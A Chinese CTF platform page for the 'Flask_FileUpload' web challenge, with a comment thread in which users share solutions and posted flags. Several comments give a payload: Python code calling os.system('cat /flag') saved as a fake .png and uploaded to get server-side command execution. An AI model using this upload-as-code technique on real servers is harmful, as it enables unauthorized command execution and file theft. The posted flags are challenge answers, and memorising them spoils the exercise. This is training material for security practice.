Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12752
提  示:
描  述:
Flask_FileUpload
评论
221304666 3年前

为什么是cat/flag

回复 0

xiaojiang8 3年前

flag{11c51e1f3eafdc6d3ce72e17be86bb4a}

回复 0

zhb8014 3年前

flag{4b5d037a2b7ad4c8c09c440b3f0e9bf1}

回复 1

Cranestand 3年前

建一个文本文档,里面写: import os //回车 os.system('cat /flag'),然后文件后缀改成.png或.jpg后上传

回复 1
sent 2年前

@15277305951 开f12,回显在注释里面

回复 0

15277305951 3年前

file uploaded successfully! 我上传得到这个

回复 1

旋转的牛蛙 3年前

注意换行

回复 0

storn 3年前

类似于文件包含,文件中的内容只要符合python语法,就可以执行。 建一个文本文档,里面写 import os os.system("cat /flag") 然后将文件后缀改为png,上传。 再然后去看源代码,里面有flag

回复 0

xuexixiaohao 3年前

import os os.system('cat /flag')

回复 0

khalil 3年前

flag{031da75ae4719a4e3cf3f6652dbc04ad}

回复 0

107zsm 3年前

import os os.system('ls ../') os.system('cat ../flag') 文件上传后,获取flag

回复 2

baianquanzu 3年前

查看网站源码,提示我们的图片会被python执行返回 其实这一题是利用flask搭建的网站,图片中包含python的查询语句会被执行

回复 0

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

依旧是偏爱 攻破了该题 4分钟前
薄言. 攻破了该题 1天前
baizhi白栀 攻破了该题 1天前
店晓贰 攻破了该题 1天前
喜羊羊1 攻破了该题 3天前
bugkuaccount3214 攻破了该题 3天前
wendy2023 攻破了该题 5天前
wubobo 攻破了该题 5天前
GrantFly 攻破了该题 6天前
yezhongyu 攻破了该题 7天前
y-123456 攻破了该题 7天前
ljy1997 攻破了该题 8天前
18342200996 攻破了该题 9天前
dacming9527 攻破了该题 9天前
zdnxl 攻破了该题 10天前
秦npc 攻破了该题 10天前
安藏七月 攻破了该题 11天前
ggtom 攻破了该题 11天前
baisui 攻破了该题 13天前
ccxxxc 攻破了该题 13天前
问题反馈